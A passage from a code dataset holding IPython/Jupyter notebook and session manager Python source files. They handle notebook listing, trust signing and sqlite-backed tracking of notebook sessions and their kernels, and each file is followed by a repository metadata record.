        bool
        """
        raise NotImplementedError('must be implemented in a subclass')

    # TODO: Remove this after we create the contents web service and directories are
    # no longer listed by the notebook web service.
    def list_dirs(self, path):
        """List the directory models for a given API style path."""
        raise NotImplementedError('must be implemented in a subclass')

    # TODO: Remove this after we create the contents web service and directories are
    # no longer listed by the notebook web service.
    def get_dir_model(self, name, path=''):
        """Get the directory model given a directory name and its API style path.

        The keys in the model should be:
        * name
        * path
        * last_modified
        * created
        * type='directory'
        """
        raise NotImplementedError('must be implemented in a subclass')

    def list_notebooks(self, path=''):
        """Return a list of notebook dicts without content.

        This returns a list of dicts, each of the form::

            dict(notebook_id=notebook,name=name)

        This list of dicts should be sorted by name::

            data = sorted(data, key=lambda item: item['name'])
        """
        raise NotImplementedError('must be implemented in a subclass')

    def get_notebook(self, name, path='', content=True):
        """Get the notebook model with or without content."""
        raise NotImplementedError('must be implemented in a subclass')

    def save_notebook(self, model, name, path=''):
        """Save the notebook and return the model with no content."""
        raise NotImplementedError('must be implemented in a subclass')

    def update_notebook(self, model, name, path=''):
        """Update the notebook and return the model with no content."""
        raise NotImplementedError('must be implemented in a subclass')

    def delete_notebook(self, name, path=''):
        """Delete notebook by name and path."""
        raise NotImplementedError('must be implemented in a subclass')

    def create_checkpoint(self, name, path=''):
        """Create a checkpoint of the current state of a notebook

        Returns a checkpoint_id for the new checkpoint.
        """
        raise NotImplementedError("must be implemented in a subclass")

    def list_checkpoints(self, name, path=''):
        """Return a list of checkpoints for a given notebook"""
        return []

    def restore_checkpoint(self, checkpoint_id, name, path=''):
        """Restore a notebook from one of its checkpoints"""
        raise NotImplementedError("must be implemented in a subclass")

    def delete_checkpoint(self, checkpoint_id, name, path=''):
        """delete a checkpoint for a notebook"""
        raise NotImplementedError("must be implemented in a subclass")

    def info_string(self):
        return "Serving notebooks"

    # NotebookManager API part 2: methods that have useable default
    # implementations, but can be overridden in subclasses.

    def increment_filename(self, basename, path=''):
        """Build a unique notebook name by appending an integer to *basename*.

        Parameters
        ----------
        basename : unicode
            The name of a notebook without the ``.ipynb`` file extension.
        path : unicode
            The URL path of the notebooks directory

        Returns
        -------
        name : unicode
            A notebook name (with the .ipynb extension) that starts
            with basename and does not refer to any existing notebook.
        """
        path = path.strip('/')
        # Try basename0, basename1, ... until an unused name is found.
        counter = 0
        while True:
            name = u'{basename}{i}{ext}'.format(basename=basename, i=counter,
                                                ext=self.filename_ext)
            if not self.notebook_exists(name, path):
                return name
            counter += 1

    def create_notebook(self, model=None, path=''):
        """Create a new notebook and return its model with no content."""
        path = path.strip('/')
        model = {} if model is None else model
        if 'content' not in model:
            # Start from an empty notebook when no content is supplied.
            model['content'] = current.new_notebook(
                metadata=current.new_metadata(name=u''))
        if 'name' not in model:
            model['name'] = self.increment_filename('Untitled', path)
        model['path'] = path
        return self.save_notebook(model, model['name'], model['path'])

    def copy_notebook(self, from_name, to_name=None, path=''):
        """Copy an existing notebook and return its new model.

        If to_name not specified, increment `from_name-Copy#.ipynb`.
        """
        path = path.strip('/')
        model = self.get_notebook(from_name, path)
        if not to_name:
            stem = os.path.splitext(from_name)[0] + '-Copy'
            to_name = self.increment_filename(stem, path)
        model['name'] = to_name
        return self.save_notebook(model, to_name, path)

    def log_info(self):
        self.log.info(self.info_string())

    def trust_notebook(self, name, path=''):
        """Explicitly trust a notebook

        Parameters
        ----------
        name : string
            The filename of the notebook
        path : string
            The notebook's directory
        """
        model = self.get_notebook(name, path)
        nb = model['content']
        self.log.warn("Trusting notebook %s/%s", path, name)
        self.notary.mark_cells(nb, True)
        self.save_notebook(model, name, path)

    def check_and_sign(self, nb, name, path=''):
        """Check for trusted cells, and sign the notebook.

        Called as a part of saving notebooks.

        Parameters
        ----------
        nb : dict
            The notebook structure
        name : string
            The filename of the notebook
        path : string
            The notebook's directory
        """
        if self.notary.check_cells(nb):
            self.notary.sign(nb)
        else:
            self.log.warn("Saving untrusted notebook %s/%s", path, name)

    def mark_trusted_cells(self, nb, name, path=''):
        """Mark cells as trusted if the notebook signature matches.

        Called as a part of loading notebooks.

        Parameters
        ----------
        nb : dict
            The notebook structure
        name : string
            The filename of the notebook
        path : string
            The notebook's directory
        """
        trusted = self.notary.check_signature(nb)
        if not trusted:
            self.log.warn("Notebook %s/%s is not trusted", path, name)
        self.notary.mark_cells(nb, trusted)

    def should_list(self, name):
        """Should this file/directory name be displayed in a listing?"""
        # Hidden iff any configured glob matches; equivalently, listed iff
        # every glob fails to match.
        return all(not fnmatch(name, pattern) for pattern in self.hide_globs)
| {
"repo_name": "Lightmatter/django-inlineformfield",
"path": ".tox/py27/lib/python2.7/site-packages/IPython/html/services/notebooks/nbmanager.py",
"copies": "7",
"size": "9608",
"license": "mit",
"hash": -6648545500617689000,
"line_mean": 32.9505300353,
"line_max": 84,
"alpha_frac": 0.5611990008,
"autogenerated": false,
"ratio": 4.950025759917568,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9011224760717568,
"avg_score": null,
"num_lines": null
} |
"""A base class session manager.
Authors:
* Zach Sailer
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2013 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import uuid
import sqlite3
from tornado import web
from IPython.config.configurable import LoggingConfigurable
from IPython.utils.py3compat import unicode_type
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class SessionManager(LoggingConfigurable):
    """Track notebook sessions in a lazily-created in-memory sqlite database."""

    # Session database initialized below
    _cursor = None
    _connection = None
    # Column names accepted by get_session/update_session keyword queries.
    _columns = {'session_id', 'name', 'path', 'kernel_id'}

    @property
    def cursor(self):
        """Start a cursor and create a database called 'session'"""
        if self._cursor is None:
            self._cursor = self.connection.cursor()
            self._cursor.execute("""CREATE TABLE session
                (session_id, name, path, kernel_id)""")
        return self._cursor

    @property
    def connection(self):
        """Start a database connection"""
        if self._connection is None:
            self._connection = sqlite3.connect(':memory:')
            self._connection.row_factory = self.row_factory
        return self._connection

    def __del__(self):
        """Close connection once SessionManager closes"""
        # Guard against the lazy ``cursor`` property: going through it here
        # would *create* a brand-new database (and possibly fail during
        # interpreter shutdown) just to close it.
        if self._cursor is not None:
            self._cursor.close()

    def session_exists(self, name, path):
        """Check to see if the session for a given notebook exists"""
        self.cursor.execute("SELECT * FROM session WHERE name=? AND path=?", (name, path))
        reply = self.cursor.fetchone()
        if reply is None:
            return False
        else:
            return True

    def new_session_id(self):
        "Create a uuid for a new session"
        return unicode_type(uuid.uuid4())

    def create_session(self, name=None, path=None, kernel_id=None):
        """Creates a session and returns its model"""
        session_id = self.new_session_id()
        return self.save_session(session_id, name=name, path=path, kernel_id=kernel_id)

    def save_session(self, session_id, name=None, path=None, kernel_id=None):
        """Saves the items for the session with the given session_id

        Given a session_id (and any other of the arguments), this method
        creates a row in the sqlite session database that holds the information
        for a session.

        Parameters
        ----------
        session_id : str
            uuid for the session; this method must be given a session_id
        name : str
            the .ipynb notebook name that started the session
        path : str
            the path to the named notebook
        kernel_id : str
            a uuid for the kernel associated with this session

        Returns
        -------
        model : dict
            a dictionary of the session model
        """
        self.cursor.execute("INSERT INTO session VALUES (?,?,?,?)",
            (session_id, name, path, kernel_id)
        )
        return self.get_session(session_id=session_id)

    def get_session(self, **kwargs):
        """Returns the model for a particular session.

        Takes a keyword argument and searches for the value in the session
        database, then returns the rest of the session's info.

        Parameters
        ----------
        **kwargs : keyword argument
            must be given one of the keywords and values from the session database
            (i.e. session_id, name, path, kernel_id)

        Returns
        -------
        model : dict
            returns a dictionary that includes all the information from the
            session described by the kwarg.
        """
        if not kwargs:
            raise TypeError("must specify a column to query")
        conditions = []
        for column in kwargs.keys():
            if column not in self._columns:
                # Interpolate the column name; passing it as a second
                # TypeError argument rendered the message as a tuple
                # (and is inconsistent with update_session below).
                raise TypeError("No such column: %r" % column)
            conditions.append("%s=?" % column)
        query = "SELECT * FROM session WHERE %s" % (' AND '.join(conditions))
        self.cursor.execute(query, list(kwargs.values()))
        model = self.cursor.fetchone()
        if model is None:
            q = []
            for key, value in kwargs.items():
                q.append("%s=%r" % (key, value))
            raise web.HTTPError(404, u'Session not found: %s' % (', '.join(q)))
        return model

    def update_session(self, session_id, **kwargs):
        """Updates the values in the session database.

        Changes the values of the session with the given session_id
        with the values from the keyword arguments.

        Parameters
        ----------
        session_id : str
            a uuid that identifies a session in the sqlite3 database
        **kwargs : str
            the key must correspond to a column title in session database,
            and the value replaces the current value in the session
            with session_id.
        """
        # Raises a 404 if the session does not exist.
        self.get_session(session_id=session_id)
        if not kwargs:
            # no changes
            return
        sets = []
        for column in kwargs.keys():
            if column not in self._columns:
                raise TypeError("No such column: %r" % column)
            sets.append("%s=?" % column)
        query = "UPDATE session SET %s WHERE session_id=?" % (', '.join(sets))
        self.cursor.execute(query, list(kwargs.values()) + [session_id])

    @staticmethod
    def row_factory(cursor, row):
        """Takes sqlite database session row and turns it into a dictionary"""
        row = sqlite3.Row(cursor, row)
        model = {
            'id': row['session_id'],
            'notebook': {
                'name': row['name'],
                'path': row['path']
            },
            'kernel': {
                'id': row['kernel_id'],
            }
        }
        return model

    def list_sessions(self):
        """Returns a list of dictionaries containing all the information from
        the session database"""
        c = self.cursor.execute("SELECT * FROM session")
        return list(c.fetchall())

    def delete_session(self, session_id):
        """Deletes the row in the session database with given session_id"""
        # Check that session exists before deleting
        self.get_session(session_id=session_id)
        self.cursor.execute("DELETE FROM session WHERE session_id=?", (session_id,))
| {
"repo_name": "omni5cience/django-inlineformfield",
"path": ".tox/py27/lib/python2.7/site-packages/IPython/html/services/sessions/sessionmanager.py",
"copies": "8",
"size": "6936",
"license": "mit",
"hash": -2603917421438935000,
"line_mean": 33.8542713568,
"line_max": 90,
"alpha_frac": 0.5415224913,
"autogenerated": false,
"ratio": 4.83008356545961,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9371606056759609,
"avg_score": null,
"num_lines": null
} |
"""A base class session manager."""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import uuid
import sqlite3
from tornado import web
from IPython.config.configurable import LoggingConfigurable
from IPython.utils.py3compat import unicode_type
from IPython.utils.traitlets import Instance
class SessionManager(LoggingConfigurable):
    """Track notebook sessions, backed by an in-memory sqlite database.

    Rows are joined with live kernel state via ``row_to_model``; rows whose
    kernel has died are purged lazily.
    """

    kernel_manager = Instance(
        'IPython.html.services.kernels.kernelmanager.MappingKernelManager')
    contents_manager = Instance(
        'IPython.html.services.contents.manager.ContentsManager', args=())

    # Session database initialized below
    _cursor = None
    _connection = None
    # Column names accepted by get_session/update_session keyword queries.
    _columns = {'session_id', 'path', 'kernel_id'}

    @property
    def cursor(self):
        """Start a cursor and create a database called 'session'"""
        if self._cursor is None:
            self._cursor = self.connection.cursor()
            self._cursor.execute("""CREATE TABLE session
                (session_id, path, kernel_id)""")
        return self._cursor

    @property
    def connection(self):
        """Start a database connection"""
        if self._connection is None:
            self._connection = sqlite3.connect(':memory:')
            self._connection.row_factory = sqlite3.Row
        return self._connection

    def __del__(self):
        """Close connection once SessionManager closes"""
        # Guard against the lazy ``cursor`` property: going through it here
        # would *create* a brand-new database (and possibly fail during
        # interpreter shutdown) just to close it.
        if self._cursor is not None:
            self._cursor.close()

    def session_exists(self, path):
        """Check to see if the session for a given notebook exists"""
        self.cursor.execute("SELECT * FROM session WHERE path=?", (path,))
        reply = self.cursor.fetchone()
        if reply is None:
            return False
        else:
            return True

    def new_session_id(self):
        "Create a uuid for a new session"
        return unicode_type(uuid.uuid4())

    def create_session(self, path=None, kernel_name=None):
        """Creates a session and returns its model"""
        session_id = self.new_session_id()
        # allow nbm to specify kernels cwd
        kernel_path = self.contents_manager.get_kernel_path(path=path)
        kernel_id = self.kernel_manager.start_kernel(path=kernel_path,
                                                     kernel_name=kernel_name)
        return self.save_session(session_id, path=path,
                                 kernel_id=kernel_id)

    def save_session(self, session_id, path=None, kernel_id=None):
        """Saves the items for the session with the given session_id

        Given a session_id (and any other of the arguments), this method
        creates a row in the sqlite session database that holds the information
        for a session.

        Parameters
        ----------
        session_id : str
            uuid for the session; this method must be given a session_id
        path : str
            the path for the given notebook
        kernel_id : str
            a uuid for the kernel associated with this session

        Returns
        -------
        model : dict
            a dictionary of the session model
        """
        self.cursor.execute("INSERT INTO session VALUES (?,?,?)",
            (session_id, path, kernel_id)
        )
        return self.get_session(session_id=session_id)

    def get_session(self, **kwargs):
        """Returns the model for a particular session.

        Takes a keyword argument and searches for the value in the session
        database, then returns the rest of the session's info.

        Parameters
        ----------
        **kwargs : keyword argument
            must be given one of the keywords and values from the session database
            (i.e. session_id, path, kernel_id)

        Returns
        -------
        model : dict
            returns a dictionary that includes all the information from the
            session described by the kwarg.
        """
        if not kwargs:
            raise TypeError("must specify a column to query")
        conditions = []
        for column in kwargs.keys():
            if column not in self._columns:
                # Interpolate the column name; passing it as a second
                # TypeError argument rendered the message as a tuple
                # (and is inconsistent with update_session below).
                raise TypeError("No such column: %r" % column)
            conditions.append("%s=?" % column)
        query = "SELECT * FROM session WHERE %s" % (' AND '.join(conditions))
        self.cursor.execute(query, list(kwargs.values()))
        try:
            row = self.cursor.fetchone()
        except KeyError:
            # The kernel is missing, so the session just got deleted.
            row = None
        if row is None:
            q = []
            for key, value in kwargs.items():
                q.append("%s=%r" % (key, value))
            raise web.HTTPError(404, u'Session not found: %s' % (', '.join(q)))
        return self.row_to_model(row)

    def update_session(self, session_id, **kwargs):
        """Updates the values in the session database.

        Changes the values of the session with the given session_id
        with the values from the keyword arguments.

        Parameters
        ----------
        session_id : str
            a uuid that identifies a session in the sqlite3 database
        **kwargs : str
            the key must correspond to a column title in session database,
            and the value replaces the current value in the session
            with session_id.
        """
        # Raises a 404 if the session does not exist.
        self.get_session(session_id=session_id)
        if not kwargs:
            # no changes
            return
        sets = []
        for column in kwargs.keys():
            if column not in self._columns:
                raise TypeError("No such column: %r" % column)
            sets.append("%s=?" % column)
        query = "UPDATE session SET %s WHERE session_id=?" % (', '.join(sets))
        self.cursor.execute(query, list(kwargs.values()) + [session_id])

    def row_to_model(self, row):
        """Takes sqlite database session row and turns it into a dictionary"""
        if row['kernel_id'] not in self.kernel_manager:
            # The kernel was killed or died without deleting the session.
            # We can't use delete_session here because that tries to find
            # and shut down the kernel.
            self.cursor.execute("DELETE FROM session WHERE session_id=?",
                                (row['session_id'],))
            raise KeyError
        model = {
            'id': row['session_id'],
            'notebook': {
                'path': row['path']
            },
            'kernel': self.kernel_manager.kernel_model(row['kernel_id'])
        }
        return model

    def list_sessions(self):
        """Returns a list of dictionaries containing all the information from
        the session database"""
        c = self.cursor.execute("SELECT * FROM session")
        result = []
        # We need to use fetchall() here, because row_to_model can delete rows,
        # which messes up the cursor if we're iterating over rows.
        for row in c.fetchall():
            try:
                result.append(self.row_to_model(row))
            except KeyError:
                pass
        return result

    def delete_session(self, session_id):
        """Deletes the row in the session database with given session_id"""
        # Check that session exists before deleting
        session = self.get_session(session_id=session_id)
        self.kernel_manager.shutdown_kernel(session['kernel']['id'])
        self.cursor.execute(
            "DELETE FROM session WHERE session_id=?", (session_id,))
| {
"repo_name": "mattvonrocketstein/smash",
"path": "smashlib/ipy3x/html/services/sessions/sessionmanager.py",
"copies": "1",
"size": "7542",
"license": "mit",
"hash": 2309167377603177500,
"line_mean": 34.7440758294,
"line_max": 82,
"alpha_frac": 0.5831344471,
"autogenerated": false,
"ratio": 4.607208307880269,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5690342754980269,
"avg_score": null,
"num_lines": null
} |
"""A base class session manager."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import os
import uuid
try:
import sqlite3
except ImportError:
# fallback on pysqlite2 if Python was build without sqlite
from pysqlite2 import dbapi2 as sqlite3
from tornado import gen, web
from traitlets.config.configurable import LoggingConfigurable
from ipython_genutils.py3compat import unicode_type
from traitlets import Instance
class SessionManager(LoggingConfigurable):
kernel_manager = Instance('notebook.services.kernels.kernelmanager.MappingKernelManager')
contents_manager = Instance('notebook.services.contents.manager.ContentsManager')
# Session database initialized below
_cursor = None
_connection = None
_columns = {'session_id', 'path', 'name', 'type', 'kernel_id'}
@property
def cursor(self):
"""Start a cursor and create a database called 'session'"""
if self._cursor is None:
self._cursor = self.connection.cursor()
self._cursor.execute("""CREATE TABLE session
(session_id, path, name, type, kernel_id)""")
return self._cursor
@property
def connection(self):
"""Start a database connection"""
if self._connection is None:
self._connection = sqlite3.connect(':memory:')
self._connection.row_factory = sqlite3.Row
return self._connection
def close(self):
"""Close the sqlite connection"""
if self._cursor is not None:
self._cursor.close()
self._cursor = None
def __del__(self):
"""Close connection once SessionManager closes"""
self.close()
def session_exists(self, path):
"""Check to see if the session of a given name exists"""
self.cursor.execute("SELECT * FROM session WHERE path=?", (path,))
reply = self.cursor.fetchone()
if reply is None:
return False
else:
return True
def new_session_id(self):
"Create a uuid for a new session"
return unicode_type(uuid.uuid4())
@gen.coroutine
def create_session(self, path=None, name=None, type=None, kernel_name=None, kernel_id=None):
"""Creates a session and returns its model"""
session_id = self.new_session_id()
if kernel_id is not None and kernel_id in self.kernel_manager:
pass
else:
kernel_id = yield self.start_kernel_for_session(session_id, path, name, type, kernel_name)
result = yield gen.maybe_future(
self.save_session(session_id, path=path, name=name, type=type, kernel_id=kernel_id)
)
# py2-compat
raise gen.Return(result)
@gen.coroutine
def start_kernel_for_session(self, session_id, path, name, type, kernel_name):
"""Start a new kernel for a given session."""
# allow contents manager to specify kernels cwd
kernel_path = self.contents_manager.get_kernel_path(path=path)
kernel_id = yield gen.maybe_future(
self.kernel_manager.start_kernel(path=kernel_path, kernel_name=kernel_name)
)
# py2-compat
raise gen.Return(kernel_id)
def save_session(self, session_id, path=None, name=None, type=None, kernel_id=None):
"""Saves the items for the session with the given session_id
Given a session_id (and any other of the arguments), this method
creates a row in the sqlite session database that holds the information
for a session.
Parameters
----------
session_id : str
uuid for the session; this method must be given a session_id
path : str
the path for the given session
name: str
the name of the session
type: string
the type of the session
kernel_id : str
a uuid for the kernel associated with this session
Returns
-------
model : dict
a dictionary of the session model
"""
self.cursor.execute("INSERT INTO session VALUES (?,?,?,?,?)",
(session_id, path, name, type, kernel_id)
)
return self.get_session(session_id=session_id)
def get_session(self, **kwargs):
    """Return the model for the single session matching the given columns.

    Parameters
    ----------
    **kwargs : keyword argument
        one or more of the session columns
        (i.e. session_id, path, name, type, kernel_id)

    Returns
    -------
    model : dict
        all the information for the matching session.

    Raises
    ------
    TypeError for no/unknown columns; web.HTTPError(404) when not found.
    """
    if not kwargs:
        raise TypeError("must specify a column to query")
    # Validate every requested column before touching the database.
    for column in kwargs:
        if column not in self._columns:
            raise TypeError("No such column: %r", column)
    where = ' AND '.join("%s=?" % column for column in kwargs)
    self.cursor.execute("SELECT * FROM session WHERE %s" % where,
                        list(kwargs.values()))
    try:
        row = self.cursor.fetchone()
    except KeyError:
        # The kernel is missing, so the session just got deleted.
        row = None
    if row is None:
        described = ', '.join("%s=%r" % item for item in kwargs.items())
        raise web.HTTPError(404, u'Session not found: %s' % described)
    return self.row_to_model(row)
def update_session(self, session_id, **kwargs):
    """Overwrite columns of the session identified by *session_id*.

    Parameters
    ----------
    session_id : str
        a uuid that identifies a session in the sqlite3 database
    **kwargs : str
        column-name -> new-value pairs; each key must be a valid
        session column.
    """
    # Raises 404 first if the session does not exist.
    self.get_session(session_id=session_id)
    if not kwargs:
        return  # nothing to change
    for column in kwargs:
        if column not in self._columns:
            raise TypeError("No such column: %r" % column)
    assignments = ', '.join("%s=?" % column for column in kwargs)
    query = "UPDATE session SET %s WHERE session_id=?" % assignments
    self.cursor.execute(query, list(kwargs.values()) + [session_id])
def row_to_model(self, row):
    """Convert a sqlite session row into a session-model dictionary."""
    kernel_id = row['kernel_id']
    if kernel_id not in self.kernel_manager:
        # The kernel was killed or died without deleting the session.
        # Delete the row directly: delete_session would try to find and
        # shut down the (already gone) kernel.
        self.cursor.execute("DELETE FROM session WHERE session_id=?",
                            (row['session_id'],))
        raise KeyError
    model = {
        'id': row['session_id'],
        'path': row['path'],
        'name': row['name'],
        'type': row['type'],
        'kernel': self.kernel_manager.kernel_model(kernel_id),
    }
    if row['type'] == 'notebook':
        # Provide the deprecated API.
        model['notebook'] = {'path': row['path'], 'name': row['name']}
    return model
def list_sessions(self):
    """Return the models of every live session in the database."""
    # fetchall() up front: row_to_model may delete rows, which would
    # confuse a cursor we were still iterating over.
    rows = self.cursor.execute("SELECT * FROM session").fetchall()
    models = []
    for row in rows:
        try:
            models.append(self.row_to_model(row))
        except KeyError:
            # Stale row (kernel died); row_to_model already removed it.
            pass
    return models
@gen.coroutine
def delete_session(self, session_id):
    """Shut down a session's kernel and remove its database row."""
    # get_session raises 404 if the session does not exist.
    session = self.get_session(session_id=session_id)
    kernel_id = session['kernel']['id']
    yield gen.maybe_future(self.kernel_manager.shutdown_kernel(kernel_id))
    self.cursor.execute("DELETE FROM session WHERE session_id=?", (session_id,))
| {
"repo_name": "nitin-cherian/LifeLongLearning",
"path": "Python/PythonProgrammingLanguage/Encapsulation/encap_env/lib/python3.5/site-packages/notebook/services/sessions/sessionmanager.py",
"copies": "5",
"size": "8745",
"license": "mit",
"hash": 2121340985598367200,
"line_mean": 35.1363636364,
"line_max": 102,
"alpha_frac": 0.5887935963,
"autogenerated": false,
"ratio": 4.448118006103764,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.006132321684768975,
"num_lines": 242
} |
"""A base class session manager."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import uuid
import sqlite3
from tornado import web
from traitlets.config.configurable import LoggingConfigurable
from ipython_genutils.py3compat import unicode_type
from traitlets import Instance
class SessionManager(LoggingConfigurable):
    """Map notebook paths to running kernels via an in-memory sqlite table.

    Each row of the ``session`` table holds (session_id, path, kernel_id).
    The connection and cursor are created lazily on first use.
    """

    kernel_manager = Instance('notebook.services.kernels.kernelmanager.MappingKernelManager')
    contents_manager = Instance('notebook.services.contents.manager.ContentsManager')

    # Session database initialized lazily by the ``cursor`` property below.
    _cursor = None
    _connection = None
    _columns = {'session_id', 'path', 'kernel_id'}

    @property
    def cursor(self):
        """Start a cursor and create a database called 'session'"""
        if self._cursor is None:
            self._cursor = self.connection.cursor()
            self._cursor.execute("""CREATE TABLE session
                (session_id, path, kernel_id)""")
        return self._cursor

    @property
    def connection(self):
        """Start a database connection"""
        if self._connection is None:
            self._connection = sqlite3.connect(':memory:')
            # sqlite3.Row gives dict-style access in row_to_model.
            self._connection.row_factory = sqlite3.Row
        return self._connection

    def close(self):
        """Close the sqlite cursor, if one was ever created."""
        # Check the private attribute: going through the ``cursor`` property
        # would lazily *create* a connection just to close it again.
        if self._cursor is not None:
            self._cursor.close()
            self._cursor = None

    def __del__(self):
        """Close connection once SessionManager closes"""
        # Bug fix: previously this called ``self.cursor.close()``
        # unconditionally, which created a brand-new connection and table
        # during interpreter teardown whenever the manager was never used.
        self.close()

    def session_exists(self, path):
        """Check to see if the session for a given notebook exists"""
        self.cursor.execute("SELECT * FROM session WHERE path=?", (path,))
        reply = self.cursor.fetchone()
        if reply is None:
            return False
        else:
            return True

    def new_session_id(self):
        "Create a uuid for a new session"
        return unicode_type(uuid.uuid4())

    def create_session(self, path=None, kernel_name=None):
        """Creates a session and returns its model"""
        session_id = self.new_session_id()
        # allow nbm to specify kernels cwd
        kernel_path = self.contents_manager.get_kernel_path(path=path)
        kernel_id = self.kernel_manager.start_kernel(path=kernel_path,
                                                     kernel_name=kernel_name)
        return self.save_session(session_id, path=path,
                                 kernel_id=kernel_id)

    def save_session(self, session_id, path=None, kernel_id=None):
        """Saves the items for the session with the given session_id

        Given a session_id (and any other of the arguments), this method
        creates a row in the sqlite session database that holds the
        information for a session.

        Parameters
        ----------
        session_id : str
            uuid for the session; this method must be given a session_id
        path : str
            the path for the given notebook
        kernel_id : str
            a uuid for the kernel associated with this session

        Returns
        -------
        model : dict
            a dictionary of the session model
        """
        self.cursor.execute("INSERT INTO session VALUES (?,?,?)",
            (session_id, path, kernel_id)
        )
        return self.get_session(session_id=session_id)

    def get_session(self, **kwargs):
        """Returns the model for a particular session.

        Takes a keyword argument and searches for the value in the session
        database, then returns the rest of the session's info.

        Parameters
        ----------
        **kwargs : keyword argument
            must be given one of the keywords and values from the session
            database (i.e. session_id, path, kernel_id)

        Returns
        -------
        model : dict
            returns a dictionary that includes all the information from the
            session described by the kwarg.
        """
        if not kwargs:
            raise TypeError("must specify a column to query")
        conditions = []
        for column in kwargs.keys():
            if column not in self._columns:
                raise TypeError("No such column: %r", column)
            conditions.append("%s=?" % column)
        query = "SELECT * FROM session WHERE %s" % (' AND '.join(conditions))
        self.cursor.execute(query, list(kwargs.values()))
        try:
            row = self.cursor.fetchone()
        except KeyError:
            # The kernel is missing, so the session just got deleted.
            row = None
        if row is None:
            q = []
            for key, value in kwargs.items():
                q.append("%s=%r" % (key, value))
            raise web.HTTPError(404, u'Session not found: %s' % (', '.join(q)))
        return self.row_to_model(row)

    def update_session(self, session_id, **kwargs):
        """Updates the values in the session database.

        Changes the values of the session with the given session_id
        with the values from the keyword arguments.

        Parameters
        ----------
        session_id : str
            a uuid that identifies a session in the sqlite3 database
        **kwargs : str
            the key must correspond to a column title in session database,
            and the value replaces the current value in the session
            with session_id.
        """
        # Raises 404 first if the session does not exist.
        self.get_session(session_id=session_id)
        if not kwargs:
            # no changes
            return
        sets = []
        for column in kwargs.keys():
            if column not in self._columns:
                raise TypeError("No such column: %r" % column)
            sets.append("%s=?" % column)
        query = "UPDATE session SET %s WHERE session_id=?" % (', '.join(sets))
        self.cursor.execute(query, list(kwargs.values()) + [session_id])

    def row_to_model(self, row):
        """Takes sqlite database session row and turns it into a dictionary"""
        if row['kernel_id'] not in self.kernel_manager:
            # The kernel was killed or died without deleting the session.
            # We can't use delete_session here because that tries to find
            # and shut down the kernel.
            self.cursor.execute("DELETE FROM session WHERE session_id=?",
                                (row['session_id'],))
            raise KeyError
        model = {
            'id': row['session_id'],
            'notebook': {
                'path': row['path']
            },
            'kernel': self.kernel_manager.kernel_model(row['kernel_id'])
        }
        return model

    def list_sessions(self):
        """Returns a list of dictionaries containing all the information from
        the session database"""
        c = self.cursor.execute("SELECT * FROM session")
        result = []
        # We need to use fetchall() here, because row_to_model can delete rows,
        # which messes up the cursor if we're iterating over rows.
        for row in c.fetchall():
            try:
                result.append(self.row_to_model(row))
            except KeyError:
                pass
        return result

    def delete_session(self, session_id):
        """Deletes the row in the session database with given session_id"""
        # Check that session exists (raises 404) before deleting.
        session = self.get_session(session_id=session_id)
        self.kernel_manager.shutdown_kernel(session['kernel']['id'])
        self.cursor.execute("DELETE FROM session WHERE session_id=?", (session_id,))
| {
"repo_name": "bdh1011/wau",
"path": "venv/lib/python2.7/site-packages/notebook/services/sessions/sessionmanager.py",
"copies": "1",
"size": "7514",
"license": "mit",
"hash": 4386023095671664600,
"line_mean": 35.125,
"line_max": 93,
"alpha_frac": 0.5830449827,
"autogenerated": false,
"ratio": 4.621156211562115,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5704201194262115,
"avg_score": null,
"num_lines": null
} |
"""A base class session manager."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import uuid
try:
import sqlite3
except ImportError:
# fallback on pysqlite2 if Python was build without sqlite
from pysqlite2 import dbapi2 as sqlite3
from tornado import gen, web
from traitlets.config.configurable import LoggingConfigurable
from ipython_genutils.py3compat import unicode_type
from traitlets import Instance
from notebook.utils import maybe_future
class SessionManager(LoggingConfigurable):
    """Maps sessions (path/name/type) to kernels, backed by in-memory sqlite.

    All public methods are tornado coroutines (py2-compatible via
    ``gen.Return``) so subclasses may perform async work.
    """

    kernel_manager = Instance('notebook.services.kernels.kernelmanager.MappingKernelManager')
    contents_manager = Instance('notebook.services.contents.manager.ContentsManager')

    # Session database initialized lazily by the ``cursor`` property below.
    _cursor = None
    _connection = None
    _columns = {'session_id', 'path', 'name', 'type', 'kernel_id'}

    @property
    def cursor(self):
        """Start a cursor and create a database called 'session'"""
        if self._cursor is None:
            self._cursor = self.connection.cursor()
            self._cursor.execute("""CREATE TABLE session
                (session_id, path, name, type, kernel_id)""")
        return self._cursor

    @property
    def connection(self):
        """Start a database connection"""
        if self._connection is None:
            self._connection = sqlite3.connect(':memory:')
            # sqlite3.Row gives dict-style access in row_to_model.
            self._connection.row_factory = sqlite3.Row
        return self._connection

    def close(self):
        """Close the sqlite connection"""
        # Guard on the private attribute so a never-used manager does not
        # lazily create a connection just to close it.
        if self._cursor is not None:
            self._cursor.close()
            self._cursor = None

    def __del__(self):
        """Close connection once SessionManager closes"""
        self.close()

    @gen.coroutine
    def session_exists(self, path):
        """Check to see if the session of a given name exists"""
        exists = False
        self.cursor.execute("SELECT * FROM session WHERE path=?", (path,))
        row = self.cursor.fetchone()
        if row is not None:
            # Note, although we found a row for the session, the associated kernel may have
            # been culled or died unexpectedly. If that's the case, we should delete the
            # row, thereby terminating the session. This can be done via a call to
            # row_to_model that tolerates that condition. If row_to_model returns None,
            # we'll return false, since, at that point, the session doesn't exist anyway.
            model = yield maybe_future(self.row_to_model(row, tolerate_culled=True))
            if model is not None:
                exists = True
        raise gen.Return(exists)

    def new_session_id(self):
        "Create a uuid for a new session"
        return unicode_type(uuid.uuid4())

    @gen.coroutine
    def create_session(self, path=None, name=None, type=None, kernel_name=None, kernel_id=None):
